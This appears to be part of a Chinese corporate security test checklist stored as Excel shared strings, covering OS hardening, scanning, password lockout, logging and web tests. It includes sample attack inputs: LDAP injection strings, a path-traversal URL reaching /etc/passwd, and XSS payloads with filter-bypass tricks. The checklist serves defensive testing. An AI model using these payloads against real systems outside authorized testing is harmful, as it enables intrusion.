    <t>远程连接使用SSH连接，而不是不安全的RSH连接。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可以修改密码或关键配置等功能的维护管理接口或工具不应是默认安装的，如需使用，安装并配置完成后可删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查应用系统的可以修改密码或关键配置等功能的维护管理接口或工具是否是默认安装的，并且配置完后是否删除。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查部署实际的应用系统时是否连带部署了用于测试或教学目的的测试应用程序。
2.在线访问该测试应用，查看是否可上传木马直接获得webshell等操作。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、向受影响的系统发送特制的TCP消息重置TCP连接</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：使用如下命令查询系统中包含的shell类型：
[root@www ~]# rpm -qa | grep sh
tcsh-6.14-17.el5
nash-5.1.19.6-61
shared-mime-info-0.19-5.el5
shadow-utils-4.0.17-15.el5
ksh-20100202-1.el5
openssh-4.3p2-41.el5
openssh-server-4.3p2-41.el5
bash-3.2-24.el5
crash-4.1.2-4.el5
rsh-0.17-40.el5
openssh-clients-4.3p2-41.el5
openssh-askpass-4.3p2-41.el5
方法二：查看shells文件内容：
[root@www ~]# cat /etc/shells 
/bin/sh
/bin/bash
/sbin/nologin
/bin/tcsh
/bin/csh
/bin/ksh</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.对被测协议组件的安装包进行反汇编。
2.查找反汇编中是否存在危险函数。例如：strcpy、memcpy等。
3.分析危险函数上下文，看是否存在可能的溢出点。
4.通过动态调试工具加载应用程序，动态调试溢出漏洞。
5.如果可以拿到应用程序源码，应该结合源码进行分析。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.被测协议安装包进行了混淆或加壳，可以防止被逆向或增加逆向的难度。
2.多使用安全函数，危险函数使用严格受控。
3.被测协议不存在缓冲区溢出漏洞。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查TCP初始化序列号的实现是否完全遵从RFC 6528，是否存在非RFC遵从的弱点。
2.使用Hping2，观察打印出的当前ISN与前一个ISN的不同，ISN的变化0&lt;ISN&lt;2^32，即确保ISN的值不可预测。
Hping2使用命令：hping2 IP --seqnum -p 23 -S -s 5678 -k -I eth1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>TCP初始化序列号的实现完全遵从RFC 6528，不存在非RFC遵从的弱点，或ISN可以有2^32种值。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>通过代码审计工具查找SSH代码中可能导致线程冲突的函数，如SSH2_Mac_Compute、kex_dh_hash等，增加线程安全的处理逻辑。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、查找产品资料，看系统支持的IPSec新建速率是多少。
2、配置VPN大呼工具，IPSec并发连接数大于系统支持的新建速率（可以使用多台pc安装SuperCall，同时发起新建连接）。
3、运行一段时间后，查看系统每秒新建的IPSec隧道数，是否无法新建，或新建速率急剧下降。
备注：此检查项也可以结合对开发人员的访谈进行，看系统是否支持限速策略。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、通过不同方式（ssh、web等）登录访问设备，新增配置snmp的认证密钥和加密密钥，看是否可以配置相同的值。
2、尝试修改已有的配置，看是否可以将两个密钥配置相同。
3、直接修改设备启动时加载的配置文件，将snmp认证密钥和加密密钥配置为相同的值，重启设备，看是否可以通过配置恢复设置成功。
备注：设置snmp认证密钥和加密密钥时，还要关注验证是否符合复杂度要求。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.仅输入*字符作为LDAP搜索项；
2.输入大量的闭括号）））））））；
3.输入各种旨在干扰不同类型查询的表达式，并查看是会影响返回结果。例如：)(cn=*. *))(|(cn=*. *))%00等；
4.在输入结尾增加其他属性，用，分隔这些属性。常用在LDAP查询中的属性有cn.mail.address.phonenumber.uid.dn等。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.识别出CORBA接口可能会操作数据库的功能。
2.如果有源代码直接通过搜索构造SQL语句的地方，识别出相应的功能。
3.识别出这些功能后，构造简单的SQL语句，查看结果。构造SQL语句详见SQL注入测试方法。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在注入点，所有构造的sql语句不能执行成功。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>命令不会被执行，对参数合法性进行检查。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务正常，网络可到达；可以获取源代码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>时</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品在最后一轮测试时，必须对要发布的软件包进行两款主流病毒扫描，并将扫描结果记录到安全测试报告。
1、检查产品的发布资料是否包含防病毒扫描记录；
2、检查扫描结果是否告警，对于告警是否有说明；
3、最后一轮测试，对要发布的软件包进行病毒扫描，将结果记录到安全测试报告中；
例如：使用windwos字段的symantec工具进行扫描：
A.打开symantec
B.选择左边第二个标签项，创建一个扫描
C.选择定置一个扫描，选择扫描文件目录
D.执行扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看报告分数，不低于70分为通过
2.对于所有的扣分项，产品必须给出未通过的原因及影响分析，直到全部条目的未通过原因得到实验室的核准</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查结果为：pass
（注：SecureCAT工具对该检查项的测试顺序，与CIS标准的顺序略有不同，但检查内容一致。即SecureCAT工具的1.6检查项，对应CIS标准的1.3检查项。）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项1.6 Configure SSH是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项2.3 Only Enable telnet If Absolutely Necessary是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>业界标准 (CIS)2.3 Only Enable telnet If Absolutely Necessary----《CIS_SUSE_Linux_Benchmark_v2.0》(P.17)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看SecureCat工具扫描报告，确认检查项2.6 Only Enable TFTP Server if Absolutely Necessary是否pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法1：(仅限suse11)使用SecureCat工具扫描操作系统，确认检查项9.3.1 Set Password Creation Requirement Parameters Using pam_cracklib (Scored)是否pass
方法2（适用于suse10/11）：
1.登陆被测系统，进入命令行模式
2.执行命令 grep pam_cracklib.so /etc/pam.d/common-password</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>无pam_cracklib.so字段</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查结果为：pass
2、执行结果为：auth required pam_tally2.so onerr=fail audit silent deny=5 unlock_time=900
备注：结果2中的值均为推荐值，当执行结果为fail时，可核对几个参数值是否为非0值。用例的核心思想是要求合理的锁定机制，具体参数可由产品线根据产品实际情况定义。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法1：(仅限suse11)使用SecureCat工具扫描操作系统，确认检查项9.3.2 Set Lockout for Failed Password Attempts (Not Scored)是否pass
方法2（适用于suse10/11）：
1.登陆被测系统，进入命令行模式
2.执行命令 grep "pam_tally2" /etc/pam.d/login</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过Nessus工具的扫描系统，检查系统是否有遗漏的补丁</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.通过报告未发现因系统补丁缺失引起的漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用codenomicon进行SSL/TLS扫描
2、观察被测设备CPU、系统、连接状态
注意事项：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、检查是否有自验证签名漏洞，若是有则检查文档中是否有“客户需替换签名证书”的声明，若是没有则存在问题。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、登录Nessus；
2、点击“Policies”菜单进入扫描策略页面；
3、点击“add”进入新建扫描策略页面；
4、在“General”—“Name”中输入扫描策略名称“话机 Policy”；
5、点击“Next”进入“Plugins”页面，点击“Enable All”按钮选择所有插件；
6、点击“Next”进入“Preferences”页面,在“plugin”中选择“Database settings”，配置数据库超级用户的账号、密码及端口号；
7、点击“submit”提交扫描策略；
8、点击“Scans”菜单进入扫描工程页面；
9、点击“add”按钮进入新建扫描工程页面，在“Name”中输入扫描名称“话机”，在“Policy”选择步骤4创建的扫描策略“SSL Policy”，“Scan Targets”中输入测试环境的IP地址；点击“Launch Scan”按钮，开始扫描；
10、扫描完成，保存扫描报告。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、操作系统上不得提供不需要的服务（如在提供了SSH登录方式的情况下，又没有兼容老协议需求的要求，则telnet服务不应被安装）
2、使用单独的操作系统的非管理员权限帐号来运行数据库。
3、使用安全配置评估工具SecureCAT对数据库进行评估，要求MySql、Oracle11g、SQLServer、Sybase PostgreSQL/Proton /Gauss评估得分不低于65分。对于扣分项，应逐项提供对应的分析和说明。
4、使用Nessus、CODENOMICON最新版本（使用当时最新的漏洞插件、配置所有漏洞相关插件）对数据库进行漏洞扫描。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、操作系统上是否提供不需要的服务
2、是否使用单独的操作系统的非管理员权限帐号来运行数据库。
3、是否使用安全配置评估工具SecureCAT对数据库进行评估，
4、是否使用Nessus、CODENOMICON最新版本对数据库进行漏洞扫描。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.无论使用fuzzing工具还是手工测试都不会造成协议的拒绝服务。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.对于公开的协议，可以使用支持该协议的fuzzing工具进行测试。
2.对于私有协议，可以通过分析协议实现文档，及抓包分析协议交互过程，然后通过手工构造畸形报文测试。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、提交个人数据到后台服务器，使用burpsuite的拦截http消息，查看是否使用get方式传输个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、禁止使用get方式传输个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统存在基于角色管理帐号机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查系统设计文档或代码飞检/访谈：Web应用中针对用户提交的数据是否在服务端进行校验；数据在输出到客户端前是否先进行HTML编码
手工测试用户数据在服务端校验测试方法：
a、采用正确的用户名和口令登录系统
b、访问一个可以提交数据并且对提交的数据格式有限制的的界面（比如：添加用户，用户名不能带尖括号）
c、启动WebScarab代理，配置对GET和POST方法进行拦截
d、在浏览器上设置代理服务器为127.0.0.1，端口为8080
e、在数据提交页面中输入符合要求的数据；
f、通过burpsuite_v1.4.01拦截的并修改数据为不符合要求的数据（比如：带不被允许的特殊字符，长度不符合要求），然后提交
g、检查数据提交是否成功，如果成功，则说明服务器端没有进行输入数据的合法性校验。
2.采用Appscan对Web应用进行扫描。
3.为避免工具的误报及漏报，手工抽检请参考《Web安全测试规范 V1.4》
产品定制用例参考点：
嵌入式Web应用举例：路由器之用于配置的Web页面
非嵌入式Web应用（纯软件应用）：BS架构Web应用，产品提供MML接口/soap接口给对端Web页面调用也满足测试条件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用输出的不信任数据要进行安全编码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>业务需要使用用户的原始通信内容必须符合安全要求规范并有安全人员确认</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.证书不能过期
2.CA为第三方机构，或可信任的机构
3.应用与证书相符</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>替换证书后，系统能够正常通过HTTPS访问</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Web容器、框架无已知漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.根据Web容器、框架的版本信息，通过搜索引擎查询是否含有已知漏洞。以下列出一些常见的Web容器、框架漏洞公告页面：
Tomcat：http://tomcat.apache.org/security.html
Apache：http://httpd.apache.org/security_report.html
WebLogic：http://edocs.Weblogicfans.net/wls/docs92/security.html
JBOSS：https://rhn.redhat.com/errata/
CVE中文漏洞信息库：http://cve.scap.org.cn/
CVE漏洞库：http://cve.mitre.org/
NVD美国国家漏洞库：http://nvd.nist.gov/
Nginx漏洞地址：http://nginx.org/en/security_advisories.html
2.搜索对应版本存在的CVE漏洞
备注：
常见的Web容器：Tomcat、Apache、WebLogic、JBOSS、jetty
常见的Web框架：struts2、spring、hibernate</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不涉及个人数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不涉及角色相关</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.在测试过程中，通过burpsuite代理拦截各种get和post请求，查看cookie和隐藏域中是否包含角色、权限信息。
2.删除Cookie中的认证信息，提交服务器验证</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>请求不涉及cookie</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不涉及</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>测试日志功能：
一.执行下列操作指令：
  1.对系统配置参数的修改；
  2.对系统进行启动、关闭、重启、暂停、恢复、倒换；
  3.对业务的加载、卸载；
  4.软件的升级操作，包括远程升级和本地升级；
  5.对重要业务数据（特别是与财务相关的数据，包括：卡号、余额、话单、费率、 费用、订单、出货、帐单等）的创建、删除、修改；
  6.所有帐户（产品支持的不同权限的用户）的命令行操作命令。
二.检查是否有对应的日志记录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不涉及用户相关</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.查看产品文档是否支持证书替换功能，如果支持执行步骤2
2.按照产品说明书将证书替换成其他证书
3.观察系统是否能够正常通过HTTPS访问</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>日志文件中未记录敏感信息，如用户名，口令等信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器
2.进入Web容器日志所在目录，比如对于Tomcat，Web日志的目录为：tomcat/logs
3.查看*.log文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>日志单独分配磁盘空间，或指定单独的日志服务器进行日志记录。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器无法反馈相关文件的信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.不存在开发过程（包括现场定制）中的产生的临时文件、备份文件等。
2.如果业务需要，则这些文件必须使用了安全的随机命名规则，且不能放置在Web内容目录</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Web部署目录中，不存在调试用的代码或文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已使用appscan扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.进入Web后台服务器
2.进入Web服务部署目录，使用find命令找到struts.xml配置文件
3.查看Struts2的配置文件struts.xml，观察struts.devMode是否为false，
 &lt;constant name="struts.devMode" value="false" /&gt;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.进入系统的下载相关功能界面，下载文件:
2.检查系统URL中是否包含从文件中获取信息的问题，如http://example.com/getUserProfile.jsp?item=abc.txt,如果存在类似模式，则尝试使用../进行路径遍历。
3.使用WEB代理工具拦截消息，修改为如下方式：http://example.com/getUserProfile.jsp?item=abc.txt../../../../etc/passwd
注意：不同的后台操作系统，所使用的目录遍历方法不同。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.数据库后台日志无错误信息
2.系统前端未反馈数据库错误信息</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>已使用本地nessus扫描</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>个人数据在远程传输时，可能会受到来自公网的恶意攻击，从而导致个人数据泄露。因此，对个人数据远程传输的场景进行设计时，需要使用安全传输通道或加密后再传输。按照标准协议传输的报文头中包含IP、MAC地址等数据时，不在该规则要求内。
2）对于图片、视频等大文件的传输，如果使用安全传输通道或加密后传输，效率比较低，可以在设计时考虑提供给用户安全传输的选项，让用户自己在效率和安全性之间做选择。
3）使用安全传输通道时（如https），需要保证协商的加密算法是安全的，如使用AES。
4）使用加密后传输的方式，需要采用非对称算法，如RSA，但该算法只适用于小数据加密。
5）远程传输指数据离开设备经过公网或非信任网络进行传输的过程，蓝牙、NFC、红外等近距离传输不属于远程传输，启用了安全协议（如WPA2）的WLAN的内部传输，也可不作为远程传输要求。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、个人数据访问的保护机制，主要包括身份认证和访问控制。身份认证（如用户名、密码）限定只有经过认证的用户才能访问数据，可应用于多用户场景；访问控制（如权限控制）可应用于对应用程序的限制。
不同的个人数据，所采取的保护措施可以不同。
- 电话本、短信、通话记录等，可以使用基本的访问控制机制（如进程间不能互相访问数据），保证数据不被其他应用随意访问。
- 系统关键配置文件、NV数据等，也要采用访问控制机制，保证仅有指定的进程可以访问。
- 文件类（图片、视频、文档）一般存储在公共存储，可以不提供保护措施。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>涉及个人数据的接口，比如IMSI读取接口，通话、录音、拍照、收发短信等功能接口，是否提供安全保护机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、对用户的个人数据传输是否使用了安全的传输方式</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>访谈确认：
1、如果某个局点发布的客户端是从基线版本继承而来，对于该局点不需要的功能
（1）是否已经将代码彻底删除掉
（2）是否可以通过逻辑判断、配置文件来禁用功能
 (3) 注释掉的代码或其它形式解释性语言是否删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.所有非查询类操作（含处于隐藏模式下的命令、参数、生产调测命令等）必须有日志记录
2.所有能对系统进行管理的逻辑通信端口/协议（标准协议没有认证的例外）所有的用户操作进行日志记录。
原则：日志是安全事件发生后，问题溯源和问责的的重要证据。对于非查询类操作（如修改、删除），如不记录日志，一旦发生安全事件，华为难以免责。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、使用空口令无法登录
2、不允许存在空口令或可被质疑成空口令的内容</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.根据产品描述or其他设计文档or开发自检，梳理产品所有的访问入口及跳转位置；
2.收集版本历史中所有对内对外接口的访问方式（尤其请注意定制类接口和版本变更过程中改名或者废弃的接口）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1、所有的命令、参数、接口（含处于隐藏模式下的命令、参数、生产调测接口）必须在在产品资料中公开或受限公开。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.检查产品禁止有口令破解的命令
2.禁止有破解口令的工具放在产品中
3.禁止密文、密钥是否放在一起</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>管理端口都有认证机制</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>产品对外发布资料中配套提供通信矩阵，通信矩阵记录如下信息：通信使用的端口、协议、IP地址、认证方式、端口用途信息等。
通信矩阵每一列都描述正确。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>方法一：
1、管理功能正常启动使用
2、业务功能正常启动使用
方法二：
1、业务功能可以正常使用
2、管理功能可以正常使用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Nmap扫描结果中，未在通信端口矩阵中列出的端口都未开放。
Nmap扫描结果中，未在通信端口矩阵中列出的服务都未开放（此条为大T局点交付时测试可选项）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>病毒扫描报告里没有告警，如果有告警，必须有安全人员确认</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>生成的校验值和产品提供的校验值是一致的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.coverity没有告警
2.fortify没有告警，误报的要有安全人员的确认</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.fortify报告中没有敏感数据的告警</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.敏感数据在非信任网络不是明文传输
2.密文与密钥不可以一起传输</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>修改完成</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统内部不可以明文存储敏感数据</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>pass</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 红线条款：2.1.1 系统经业界主流漏洞扫描工具扫描，不允许存在高风险级别的漏洞。
条款相应解读（v1.5）：
产品应使用业界主流漏洞扫描工具（如Nessus等）对产品进行漏洞扫描测试（测试应使用当时最新的漏洞库、配置所有漏洞相关插件）。建议最迟在TR4A阶段启动。
扫描结果应进行分析处理，确认漏洞的实际风险级别，其中高风险级别的必须在版本发布前得到解决（如修改、补丁安装、有效规避并在资料中提示风险），中低风险级别若当前版本确实无法解决的，必须给出分析结论并明确后续解决版本。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 红线条款：
2.1.2 基于通用操作系统的新发货产品“操作系统加固+操作系统补丁”预装率=100%；对于不在生产环节预安装的产品，需要在正式发布的版本中包含默认的安全策略文件，并在产品资料中说明加固要求和操作步骤。
条款相应解读(v1.5):
产品加固后，使用SecureCAT对（Windows2003/2008/7、Rehhat5/6、Solaris10、Suse10/11、Dopra Linux系统）进行安全配置评估，评估得分不低于70分。
对于扣分项，必须提供对应的分析和说明。
建议在TR4A阶段启动安全配置评估。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>红线 红线条款：
8.1.1 系统自身操作维护类口令满足“口令安全要求”。
注：系统指交付给客户运行的整体系统，包括自研的软件、软件运行的操作系统及应用服务在内。
相关解读：
对于人机接口或可远程访问的机机接口之间，产品提供防暴力破解机制如登录失败尝试次数超阈值时的锁定（帐号或IP等）和解锁机制。对于只能在物理上本地操作的接入认证（如进入BIOS），不强制提供锁定机制；
对于机机接口，不强制要求锁定阈值和解锁时间可配置。
(CIS)9.3.2 Set Lockout for Failed Password Attempts (Not Scored)----《CIS_SUSE_Linux_Enterprise_Server_11_Benchmark_v1.0.0》(P.133)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器
2.查找下面的文件扩展名（可使用find命令）：
.asa
.inc
.zip, .tar, .gz, .tgz, .rar, ...: （ 压缩）存档文件
.java: 没有理由提供对 Java 源代码文件的访问
.txt: 文本文件
.pdf: PDF 文档
.doc, .rtf, .xls, .ppt, ...: Office 文档
.bak, .old 和其它表示备份的文件扩展名 ( 例如 : ~ 对于 Emacs 的 backup 文件 )
3.使用浏览器并在地址栏构造相应的链接查看相关文件，比如http://www.exmaple.com/xxx/xxx/xxx.bak</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.登录Web后台服务器；
2.用find命令查看Web部署目录中，是否包含如下一些后辍的文件（包括但不限于）：
.JSP、.ASP、.PHP、.Jsp、.Asp、.Php
例如：find ./ name "*.JSP"</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>业界标准</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>优秀实践</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不可以列出data或config目录下的文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统中不存在未公开的管理界面</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.没有返回结果，Web系统没有配置robots.txt
2.通过robots.txt文件不能获取敏感的目录或文件信息。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.在浏览器访问http://www.exmaple.com/robots.txt
2.观察返回结果</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不包含不安全的HTTP方法（如DELETE、PUT、TRACE、MOVE、COPY）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>struts.devMode的value为false</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web.xml中dwr对应debug值为false
2.无法访问Web系统的DWR调试页面</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.未输入cookie时，调用dwr方法的响应结果会进行未认证提示，或者响应结果会转入到登录页面；
2.未输入cookie时，响应结果为Web服务不需要认证功能方法；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>低级用户无法访问该功能方法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>连接数据库的帐号密码在配置文件中应按照红线标准加密</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.Web系统采用的Web容器配置与公司发布的规范一致
2.Web系统采用的Web容器配置与公司发布的规范不一致的地方没有引入安全风险</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>登录不成功</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>删除或是修改字段不会影响认证流程</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>服务器端不能只通过Cookie标识本次会话，还需要通过其它手段，如token、referer、动态口令以及验证码等信息，token不能被猜测，随机生成。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统正常运行，相关页面能正常访问，没有发生拒绝服务。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>跨目录下载文件不成功</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件只能上传至指定的位置，不能跨目录存储上传的文件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>不存在反射式XSS漏洞</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>黑盒测试：
1.查找系统的输入、输出点，按照正常输入规则使用，观察页面源码及GET/POST等http请求消息。
   a.GET和POST方法、URL参数、HTTP请求头、Body参数、带外通道、文件上传下载都要考虑；
   b.注意应用程序是否将Referer、User-Agent消息头复制到错误消息页面，也可能存在漏洞；
   c.有表单（form）的页面、错误页面（404, 500等）如果将用户指定的URL Path写入响应页面，也可能存在XSS漏洞，URL Path也是个输入点。
2.根据上下文语法构造嵌入脚本代码（下面仅为示例，详细可以参考《xss测试速查表》）
   a.脚本标签
 &lt;script&gt;alert(1)&lt;/script&gt;
 &lt;object data="data:text/html,&lt;script&gt;alert(1)&lt;/script&gt;"&gt;
   b.事件处理器
  &lt;img src=none.gif onerror=alert(1)&gt;
   c.脚本伪协议
  &lt;iframe src=javascript:alert(1)&gt;
   d.动态求值表达式
 &lt;x style=x:expression(alert(1))&gt;
3.若攻击不生效，探查应用程序的防御逻辑，主要分为3种：过滤、净化、长度限制
   a.过滤(主要检查对哪些字符进行过滤，然后再尝试用多层编码、空字节、非标准语法等绕过）：确定服务器对哪些字段/表达式进行了过滤。如对&lt;script&gt;标签进行了过滤，可尝试将&lt;scrpit&gt;改成&lt;ScRipt&gt;或加入空格的方式、对&lt;scrpit&gt;alert(1)&lt;/script&gt;进行编码后再输入或通过事件处理器与标签结合使用&lt;img onerror=alert(1) src=a&gt;来绕过。当对事件处理器方式也可能存在过滤：可通过改变字符大小写&lt;iMG onerror=alert(1) src=a&gt;、在任意位置插入NULL字节&lt;[%00]i[%00]MG onerror=alert(1) src=a&gt;.如对特定标签名称有过滤，可改成&lt;x onclick=alert(1) src=a&gt;Click here&lt;/x&gt;.当对标签括号进行过滤时可尝试使用 %3cimg onerror=alert(1) src=a%3e
   b.净化：（如将&lt;变成&amp;lt)首先确定对哪些字符或表达式进行了净化，再尝试绕过（与过滤方法类似)
      当只有使用已被净化的输入才能实施攻击时，则检查净化过滤的效率。如净化过滤可能仅替换第一个匹配的表达式（如&lt;script&gt;,则可尝试使用&lt;script&gt;&lt;script&gt;alert(1)&lt;/script&gt;或&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/script&gt;
